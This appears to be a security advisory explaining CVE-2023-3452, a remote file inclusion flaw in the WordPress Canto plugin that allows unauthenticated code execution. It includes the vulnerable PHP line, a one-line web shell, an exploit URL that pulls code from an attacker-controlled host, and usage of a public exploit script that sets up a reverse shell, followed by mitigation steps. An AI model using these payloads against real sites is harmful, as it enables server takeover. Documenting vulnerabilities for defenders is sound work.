CVE‑2023‑3452: Remote File Inclusion to Remote Code Execution in WordPress Canto Plugin (≤ 3.0.4)
Summary
A critical vulnerability, identified as CVE-2023-3452, affects versions of the WordPress Canto plugin up to 3.0.4. The flaw arises from a lack of input validation in the wp_abspath
parameter in the includes/lib/download.php
file. If the PHP directive allow_url_include
is enabled, this allows unauthenticated attackers to perform Remote File Inclusion (RFI), which can be escalated to Remote Code Execution (RCE).
Technical Details
Vulnerable Code
The following line in the plugin's download.php
file is the root of the issue:
require_once($_REQUEST['wp_abspath'] . '/wp-admin/admin.php');
No sanitization or validation is applied to the wp_abspath
parameter, allowing remote URLs to be included if allow_url_include
is set to On
.
Exploitation Scenario
An attacker can prepare a remote PHP file (e.g., admin.php
) containing arbitrary code such as:
<?php system($_GET['cmd']); ?>
They can then send a request like:
http://victim-site.com/wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http://attacker-server.com&cmd=whoami
This causes the victim's server to fetch and execute the remote file, effectively running the attacker's commands.
Proof-of-Concept (PoC)
A Python exploit script is available on GitHub (by leoanggal1), which:
- Hosts a local HTTP server to serve the malicious PHP file.
- Sends the RFI payload to the target.
- Allows execution of system commands or deployment of a PHP reverse shell.
Example Usage
# Run a simple command via web shell
python3 CVE-2023-3452.py \
-u http://victim-site.com \
-LHOST attacker-ip \
-c 'id'
# Upload a PHP reverse shell and wait for callback
python3 CVE-2023-3452.py \
-u http://victim-site.com \
-LHOST attacker-ip \
-NC_PORT 4444 \
-s php-reverse-shell.php
Prerequisites for Exploitation
- The server must have
allow_url_include = On
in its PHP configuration.
- The attacker needs a publicly accessible HTTP server to host the malicious PHP code.
Severity
- CVSS v3.1 Score: 9.8 (Critical)
- Attack Vector: Remote
- Authentication Required: No
- Impact: Full RCE
Mitigation
- Update the Canto plugin to version 3.0.5 or later, which patches the vulnerability.
- Disable
allow_url_include
in the PHP configuration:
allow_url_include = Off
- Audit all plugin code for any unsanitized usage of
require
, include
, or their variants using user-supplied input.
Conclusion
CVE-2023-3452 is a critical vulnerability in the Canto plugin for WordPress. It results from insecure use of dynamic file inclusion based on user input, compounded by risky PHP configurations. Exploitation can lead to full remote code execution without authentication. It is essential for administrators to patch affected systems immediately and ensure server configurations do not allow URL-based file inclusion.